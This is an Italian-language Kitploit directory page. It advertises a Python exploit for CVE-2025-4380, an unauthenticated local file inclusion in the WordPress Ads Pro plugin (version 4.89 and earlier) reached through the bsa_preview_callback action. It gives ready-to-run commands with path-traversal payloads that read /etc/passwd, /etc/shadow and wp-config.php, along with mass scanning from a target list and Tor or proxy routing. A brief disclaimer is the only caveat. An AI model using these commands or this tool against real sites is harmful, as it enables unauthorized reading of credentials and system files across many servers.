Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/r0otk3r/cve-2025-4380
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubr0otk3r/cve-2025-4380

CVE-2025-4380

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-4380 - Plugin Ads Pro <= 4.89 - Exploit di Local File Inclusion (LFI)

Descrizione

Questo exploit in Python prende di mira il plugin Ads Pro ≤ 4.89 per WordPress, vulnerabile a Local File Inclusion (LFI) tramite l'azione AJAX bsa_preview_callback.

Un attaccante non autenticato può sfruttare questa vulnerabilità per leggere file arbitrari dal filesystem del server, inclusi file sensibili come /etc/passwd, wp-config.php e altri.


Caratteristiche dell'Exploit

  • Sfrutta la vulnerabilità LFI CVE-2025-4380.
  • Supporta attacco a singolo bersaglio o di massa.
  • Salva gli output su file (opzionale).
  • Supporta proxy HTTP o routing TOR.
  • Meccanismo di retry per affidabilità.

Utilizzo

Singolo Bersaglio

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd

Più Bersagli (Scansione di Massa)

root@kitploit:~
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow

Salva Output su File

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt

Usa Proxy (es. Burp, TOR)

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080

Parametri

ArgomentoDescrizioneObbligatorio
-u, --urlURL del bersaglio (es. http://target.com)Opzionale
-l, --listFile con elenco di URL bersaglioOpzionale
-p, --pathPercorso del file da includere (es. ../../etc/passwd)Sì
-o, --outputFile di output per salvare i risultatiOpzionale
--proxyProxy (es. http://127.0.0.1:8080)Opzionale

Esempio

Screenshot_2025-07-20_18_42_08

Richiesta/Risposta Burpsuite

Screenshot_2025-07-20_18_42_45 Screenshot_2025-07-20_18_42_57

Riferimento alla Vulnerabilità

  • CVE-2025-4380

  • Plugin Ads Pro <= 4.89 - Local File Inclusion tramite bsa_template in bsa_preview_callback

⚠️ Disclaimer

Questo exploit è fornito esclusivamente a scopo didattico e per test di sicurezza autorizzati.


Canali Ufficiali

  • YouTube @rootctf
  • X @r0otk3r
Scarica lo strumento